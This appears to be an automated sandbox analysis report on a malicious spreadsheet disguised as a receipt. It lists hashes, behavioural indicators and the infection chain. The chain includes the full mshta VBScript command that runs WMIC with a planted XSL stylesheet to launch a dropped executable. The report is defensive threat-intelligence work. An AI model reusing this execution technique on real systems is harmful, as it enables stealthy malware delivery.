Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
02-07-2021 16:00
Static task
static1
Behavioral task
behavioral1
Sample
Reciept 96285898.xlsb
Resource
win7v20210410
General
-
Target
Reciept 96285898.xlsb
-
Size
134KB
-
MD5
c32e8a076a3dd64e30cd8b5c5a7a2276
-
SHA1
17b52997cf29214e7b06368269879237c09e7706
-
SHA256
709e2a3846cb20034181c4bb090b6d98499955d850970b87d49e3271184e2d8f
-
SHA512
d0a9295cdfb26fe2ee61767515ce279f5bc2c5529903875a76a7d3503215a1875c1dc1b177ce7c0031bd6bb2de6ad36ab4722dcf445bdc0e8184783636b44c50
Malware Config
Signatures
-
Processes:
resource yara_rule C:\Windows\Temp\zgbqc.exe cryptone C:\Windows\Temp\zgbqc.exe cryptone -
Blocklisted process makes network request 12 IoCs
Processes:
WMIC.exeflow pid process 36 3952 WMIC.exe 38 3952 WMIC.exe 40 3952 WMIC.exe 42 3952 WMIC.exe 44 3952 WMIC.exe 46 3952 WMIC.exe 48 3952 WMIC.exe 50 3952 WMIC.exe 52 3952 WMIC.exe 54 3952 WMIC.exe 55 3952 WMIC.exe 57 3952 WMIC.exe -
Executes dropped EXE 1 IoCs
Processes:
zgbqc.exepid process 4040 zgbqc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Processes:
WMIC.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 WMIC.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e WMIC.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 568 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes:
WMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 3952 WMIC.exe Token: SeSecurityPrivilege 3952 WMIC.exe Token: SeTakeOwnershipPrivilege 3952 WMIC.exe Token: SeLoadDriverPrivilege 3952 WMIC.exe Token: SeSystemProfilePrivilege 3952 WMIC.exe Token: SeSystemtimePrivilege 3952 WMIC.exe Token: SeProfSingleProcessPrivilege 3952 WMIC.exe Token: SeIncBasePriorityPrivilege 3952 WMIC.exe Token: SeCreatePagefilePrivilege 3952 WMIC.exe Token: SeBackupPrivilege 3952 WMIC.exe Token: SeRestorePrivilege 3952 WMIC.exe Token: SeShutdownPrivilege 3952 WMIC.exe Token: SeDebugPrivilege 3952 WMIC.exe Token: SeSystemEnvironmentPrivilege 3952 WMIC.exe Token: SeRemoteShutdownPrivilege 3952 WMIC.exe Token: SeUndockPrivilege 3952 WMIC.exe Token: SeManageVolumePrivilege 3952 WMIC.exe Token: 33 3952 WMIC.exe Token: 34 3952 WMIC.exe Token: 35 3952 WMIC.exe Token: 36 3952 WMIC.exe Token: SeIncreaseQuotaPrivilege 3952 WMIC.exe Token: SeSecurityPrivilege 3952 WMIC.exe Token: SeTakeOwnershipPrivilege 3952 WMIC.exe Token: SeLoadDriverPrivilege 3952 WMIC.exe Token: SeSystemProfilePrivilege 3952 WMIC.exe Token: SeSystemtimePrivilege 3952 WMIC.exe Token: SeProfSingleProcessPrivilege 3952 WMIC.exe Token: SeIncBasePriorityPrivilege 3952 WMIC.exe Token: SeCreatePagefilePrivilege 3952 WMIC.exe Token: SeBackupPrivilege 3952 WMIC.exe Token: SeRestorePrivilege 3952 WMIC.exe Token: SeShutdownPrivilege 3952 WMIC.exe Token: SeDebugPrivilege 3952 WMIC.exe Token: SeSystemEnvironmentPrivilege 3952 WMIC.exe Token: SeRemoteShutdownPrivilege 3952 WMIC.exe Token: SeUndockPrivilege 3952 WMIC.exe Token: SeManageVolumePrivilege 3952 WMIC.exe Token: 33 3952 WMIC.exe Token: 34 3952 WMIC.exe Token: 35 3952 WMIC.exe Token: 36 3952 WMIC.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 568 EXCEL.EXE 568 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid process 568 EXCEL.EXE 568 EXCEL.EXE 568 EXCEL.EXE 568 EXCEL.EXE 568 EXCEL.EXE 568 EXCEL.EXE 568 EXCEL.EXE 568 EXCEL.EXE 568 EXCEL.EXE 568 EXCEL.EXE 568 EXCEL.EXE 568 EXCEL.EXE 568 EXCEL.EXE -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
EXCEL.EXEmshta.EXEWMIC.exedescription pid process target process PID 568 wrote to memory of 996 568 EXCEL.EXE splwow64.exe PID 568 wrote to memory of 996 568 EXCEL.EXE splwow64.exe PID 2856 wrote to memory of 3952 2856 mshta.EXE WMIC.exe PID 2856 wrote to memory of 3952 2856 mshta.EXE WMIC.exe PID 3952 wrote to memory of 4040 3952 WMIC.exe zgbqc.exe PID 3952 wrote to memory of 4040 3952 WMIC.exe zgbqc.exe PID 3952 wrote to memory of 4040 3952 WMIC.exe zgbqc.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Reciept 96285898.xlsb"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
\??\c:\windows\system32\mshta.EXEc:\windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\xDoNotSaveChanges.xsl"" & Chr(34)),0:close")1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\xDoNotSaveChanges.xsl"2⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Temp\zgbqc.exe"C:\Windows\Temp\zgbqc.exe"3⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\xDoNotSaveChanges.xslMD5
553b4380b0dea3566cb279a965f85629
SHA1bae44084888e5bf95c6ec5a4e69d8287083e2c93
SHA2568480d432ab1b8e8b259708908898a45a893562f3cff3ed2388579fbae94825c8
SHA512e446648b995fff2bcf5a5cca3b800875b5dadd022dbf2484eb55be6c4e01711cea1c1dbbcdb78b583f3c764f4c35309aadb1d519fe3504fb6193f7647db696c7
-
C:\Windows\Temp\zgbqc.exeMD5
1fa2d8db24799c93d9b6aa37e05f5525
SHA1a4e79f386e275c345d3098a56c4269a6a8df209f
SHA256073143c5d5589117612c308b01f84c5e5b024878e98b15021ca820458219a568
SHA512ae7c8f5519425d5fcb431325b4d6d00e84bb789d3d9f19d8a4a71230e0bd13b99b692b9fb81ad38ba5b1d3e1ae6a5007b31d56358fcc3fcd07026a5586daeed3
-
C:\Windows\Temp\zgbqc.exeMD5
1fa2d8db24799c93d9b6aa37e05f5525
SHA1a4e79f386e275c345d3098a56c4269a6a8df209f
SHA256073143c5d5589117612c308b01f84c5e5b024878e98b15021ca820458219a568
SHA512ae7c8f5519425d5fcb431325b4d6d00e84bb789d3d9f19d8a4a71230e0bd13b99b692b9fb81ad38ba5b1d3e1ae6a5007b31d56358fcc3fcd07026a5586daeed3
-
memory/568-122-0x00007FFCABC90000-0x00007FFCACD7E000-memory.dmpFilesize
16.9MB
-
memory/568-118-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmpFilesize
64KB
-
memory/568-121-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmpFilesize
64KB
-
memory/568-114-0x00007FF6EE2E0000-0x00007FF6F1896000-memory.dmpFilesize
53.7MB
-
memory/568-123-0x00007FFCA9D90000-0x00007FFCABC85000-memory.dmpFilesize
31.0MB
-
memory/568-117-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmpFilesize
64KB
-
memory/568-116-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmpFilesize
64KB
-
memory/568-115-0x00007FFC8B990000-0x00007FFC8B9A0000-memory.dmpFilesize
64KB
-
memory/996-179-0x0000000000000000-mapping.dmp
-
memory/3952-180-0x0000000000000000-mapping.dmp
-
memory/4040-182-0x0000000000000000-mapping.dmp